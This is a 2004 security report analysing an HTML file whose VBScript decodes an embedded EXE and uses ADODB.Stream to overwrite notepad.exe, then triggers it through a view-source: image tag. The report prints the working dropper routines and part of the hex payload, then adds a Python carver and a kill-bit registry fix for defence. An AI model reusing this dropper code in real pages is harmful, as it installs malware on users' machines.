HTML files in Local Computer Zone
by Tan Chew Keong
11 March 2004
Introduction
Users are normally aware of the risk of opening unknown EXE, COM, SCR or PIF files, which may contain Trojan horses. However, users usually assume that HTML files cannot harm their systems and are safe to open. In this report, we analyse an HTML file containing malicious VBScript that extracts and executes an embedded EXE when the file is opened in the Local Computer Zone.
Analysis
The innocent-looking HTML file carries the malicious EXE as comma-separated hex byte values stored in a VBScript array, as shown below.
--------------------------------------------------------------------------------
<script language="vbscript">
Dim v(133)
v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00,B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00,00,00,00,00,00"
v(1)="00,00,00,00,00,00,00,00,00,00,08,01,00,00,0E,1F,BA,0E,00,B4,09,CD,21,B8,01,4C,CD,21,63,61,6E,6E,6F,74,20,62,65"
v(2)="20,72,75,6E,20,69,6E,20,44,4F,53,20,6D,6F,64,65,2E,0D,0D,0A,24,00,00,00,00,00,00,00,1B,57,DD,FC,07,5B,DD,86,1B"
v(3)="57,DD,94,13,0A,DD,85,1B,57,DD,04,13,0A,DD,85,1B,57,DD,04,07,59,DD,86,1B,57,DD,E8,04,DD,FE,3A,5C,DD,84,1B,57,DD"
v(4)="FE,3A,53,DD,84,1B,57,DD,87,1B,56,DD,F4,1B,57,DD,81,38,5C,DD,84,1B,57,DD,40,1D,51,DD,00,00,00,00,00,00,00,00,00"
v(5)="00,00,00,00,00,00,00,00,00,00,00,00,00,00,50,45,00,00,4C,01,03,00,04,B1,45,3F,00,00,00,00,10,00,00,00,10,00,00"
v(6)="00,50,00,00,40,69,00,00,00,60,00,00,00,70,00,00,00,00,40,00,00,10,00,00,00,02,00,00,00,00,00,00,80,00,00,00,10"
v(7)="00,00,00,00,00,00,02,00,00,00,00,00,10,00,00,10,00,00,00,00,10,00,00,10,00,00,00,00,00,A8,78,00,00,F8,00,00,00"
v(8)="00,70,00,00,A8,08,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
OTHER LINES REMOVED
--------------------------------------------------------------------------------
A default installation of Internet Explorer allows the ADODB.Stream and ADODB.Recordset ActiveX controls to be instantiated in the Local Computer Zone without prompting the user. The malicious HTML file uses these two controls to write the embedded EXE out to the local disk. It defines two VBScript routines, convToBinary and saveFile. convToBinary converts a VBScript string into a binary byte array that ADODB.Stream can write; it does this by appending the string to a binary (adLongVarBinary) Recordset field and reading it back with GetChunk. saveFile takes a filename and a byte array, opens a binary ADODB.Stream, writes the array into it and saves it to disk, overwriting any existing file of that name. The two routines are shown below.
--------------------------------------------------------------------------------
Function convToBinary(inData)
    ' Turns a VBScript string of raw bytes into a binary byte array by
    ' round-tripping it through a binary Recordset field.
    Dim rs, lenInData
    Set rs = CreateObject("ADODB.Recordset")
    lenInData = LenB(inData)
    If lenInData > 0 Then
        rs.Fields.Append "temp", 205, lenInData   ' 205 = adLongVarBinary
        rs.Open
        rs.AddNew
        rs.Fields("temp").AppendChunk(inData)
        rs.Update
        convToBinary = rs("temp").GetChunk(lenInData)   ' read back as a byte array
    End If
End Function

Sub saveFile(FileName, ByteArray)
    ' Writes the byte array to disk through a binary ADODB.Stream.
    Dim bs
    Set bs = CreateObject("ADODB.Stream")
    bs.Type = 1                  ' 1 = adTypeBinary
    bs.Open
    bs.Write ByteArray
    bs.SaveToFile FileName, 2    ' 2 = adSaveCreateOverWrite: replaces an existing file
End Sub
--------------------------------------------------------------------------------
The code that extracts the EXE and writes it to disk is shown below; the loop that builds the byte string s from the array v is not reproduced in the excerpt. That loop splits each element of v at the commas, converts each hex value into a byte and joins them into a single byte string s. This byte string is passed to convToBinary to obtain a byte array, which is then written to disk with saveFile. Note that notepad.exe in both c:\windows\system32\ and c:\winnt\system32\ is overwritten with the malicious EXE; both paths are tried so that the write succeeds whichever system directory the host uses, and the "on error resume next" at the top suppresses the error from the path that does not exist.
Lastly, the document.write statement emits a 1x1 image tag whose source uses the view-source: protocol. Internet Explorer handles a view-source: URL by launching the system source viewer, notepad.exe, on the referenced file; since notepad.exe has already been overwritten, this launches the malicious EXE.
--------------------------------------------------------------------------------
on error resume next                        ' keep going if a write fails (only one path exists)
Dim y
y = convToBinary(s)                         ' s: byte string assembled from v() (loop not shown)
saveFile "c:\windows\system32\notepad.exe", y
saveFile "c:\winnt\system32\notepad.exe", y
' view-source: opens the named file in notepad.exe, which is now the malicious EXE
document.write("<img src=""view-source:file://c:/winnt/system32/SQLSRDME.TXT"" width=1 height=1>")
--------------------------------------------------------------------------------
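For an analyst who receives such a file, the two things worth recovering are the indicator strings and the embedded EXE itself. The following Python script is an added example, not code from the report or from the malicious file: it scans an HTML file for the ADODB.Stream/Recordset dropper pattern described above, reassembles the v(n) hex array into the embedded file (sorting by index, as the dropper's own loop does) and sanity-checks the result as a PE image. The sample input is constructed here: v(0) is the first array element printed above, while v(1) and v(2) are synthetic stand-ins that carry a valid e_lfanew and COFF header (their values echo the report's v(5)); the real file's remaining elements are not reproduced.

```python
import hashlib
import re
import struct

# Constructed sample of the dropper's layout (not the real file). v(0) is the first
# array element shown in the report; v(1) and v(2) are synthetic, just long enough
# to carry a valid e_lfanew and COFF header. The COFF values 4C 01 / 03 00 /
# 04 B1 45 3F echo the report's v(5). Elements are deliberately listed out of
# order so the carver's index sorting is exercised.
_V1 = ",".join(["00"] * 23) + ",40,00,00,00,50,45,00,00,4C,01,03,00"
SAMPLE_HTML = '''<html><body><script language="vbscript">
Dim v(133)
v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00,B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00,00,00,00,00,00"
v(2)="04,B1,45,3F,00,00,00,00,00,00,00,00,E0,00,02,01"
v(1)="''' + _V1 + '''"
Set rs = CreateObject("ADODB.Recordset")
rs.Fields("temp").AppendChunk(inData)
Set bs = CreateObject("adodb.stream")
bs.SaveToFile FileName, 2
document.write("<img src=""view-source:file://c:/winnt/system32/SQLSRDME.TXT"" width=1 height=1>")
</script></body></html>'''

# Strings that mark this dropper pattern. VBScript identifiers and ProgIDs are
# case-insensitive, so the scan compares lowercased text.
INDICATORS = ("ADODB.Stream", "ADODB.Recordset", "AppendChunk", "SaveToFile", "view-source:")


def find_indicators(html):
    """Return the indicator strings present in html, matched case-insensitively."""
    lowered = html.lower()
    return [s for s in INDICATORS if s.lower() in lowered]


def carve_embedded_exe(html, array_name="v"):
    """Rebuild the embedded file from assignments of the form v(N)="4D,5A,...".

    The dropper concatenates the elements in index order, so the carver does the
    same regardless of the order in which the assignments appear in the source.
    """
    pattern = re.compile(r"\b" + re.escape(array_name) + r'\((\d+)\)\s*=\s*"([0-9A-Fa-f,\s]*)"')
    chunks = {}
    for match in pattern.finditer(html):
        hex_values = [h for h in match.group(2).split(",") if h.strip()]
        chunks[int(match.group(1))] = bytes(int(h.strip(), 16) for h in hex_values)
    if not chunks:
        raise ValueError("no %s(N) hex array found" % array_name)
    return b"".join(chunks[i] for i in sorted(chunks))


def describe_pe(blob):
    """Sanity-check carved bytes as a PE image and return header facts for the report."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("carved data does not start with an MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%X" % e_lfanew)
    if len(blob) < e_lfanew + 12:
        raise ValueError("COFF header is truncated")
    machine, sections, timestamp = struct.unpack_from("<HHI", blob, e_lfanew + 4)
    return {
        "size": len(blob),
        "e_lfanew": e_lfanew,
        "machine": machine,        # 0x14C = IMAGE_FILE_MACHINE_I386
        "sections": sections,
        "timestamp": timestamp,    # link time, seconds since the Unix epoch
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    print("indicators:", ", ".join(find_indicators(SAMPLE_HTML)))
    exe = carve_embedded_exe(SAMPLE_HTML)
    for key, value in describe_pe(exe).items():
        print("%-10s %s" % (key, hex(value) if key in ("e_lfanew", "machine", "timestamp") else value))
```

In practice carve_embedded_exe is run over the captured HTML and the returned bytes written to a file for further analysis, while describe_pe supplies the header facts and SHA-256 to record in the report. Because elements are sorted by index, an author who shuffles the assignments or renames the array (pass array_name) does not defeat the carver; a missing PE signature or truncated header is reported rather than silently producing garbage.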
Mitigation
Users should be reminded to be vigilant even when opening innocent-looking HTML files. They should also avoid working as Administrator: a non-administrative account cannot overwrite notepad.exe in the system directory on an NTFS volume, although the script could still drop the EXE into a location the user can write to. In addition, the kill-bit should be set for the ADODB.Stream ActiveX control to prevent malicious HTML files from misusing it. Setting the kill-bit stops Internet Explorer from activating the control, so the HTML file above can no longer write its payload to disk. Note that the kill-bit governs only Internet Explorer and other MSHTML hosts; it does not stop a script run directly by Windows Script Host from creating the object.
The CLSID of this ActiveX control is {00000566-0000-0010-8000-00AA006D2EA4}.
Information on setting the kill-bit can be found in Microsoft Knowledge Base Article 240797.
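The registry change that KB 240797 describes, written out as a .reg file that can be imported with regedit. This is an added example based on the article's procedure, not something supplied by the report; the CLSID is the one given above and 0x400 is the Compatibility Flags value that KB 240797 designates as the kill-bit.

```reg
Windows Registry Editor Version 5.00

; Kill-bit for the ADODB.Stream control ({00000566-0000-0010-8000-00AA006D2EA4}).
; Compatibility Flags 0x400 tells Internet Explorer never to instantiate this CLSID.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}]
"Compatibility Flags"=dword:00000400
```

After importing the file, the CreateObject("ADODB.Stream") call in the malicious script fails inside Internet Explorer and, with "on error resume next" in force, the page silently drops nothing. Because the value lives under HKEY_LOCAL_MACHINE it needs administrative rights to apply and then covers every user on the machine.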
Conclusion
In this report, we see that opening a malicious HTML file in the Local Computer Zone can be dangerous. Scripts within the HTML file can extract an embedded malicious EXE and execute it. Ways of mitigating this risk have been suggested above.
Contacts
For further enquiries or to submit malicious code for our analysis, email them to the following.
Overall-in-charge: Tan Chew Keong
Updated: 11/3/2004
webmaster@security.org.sg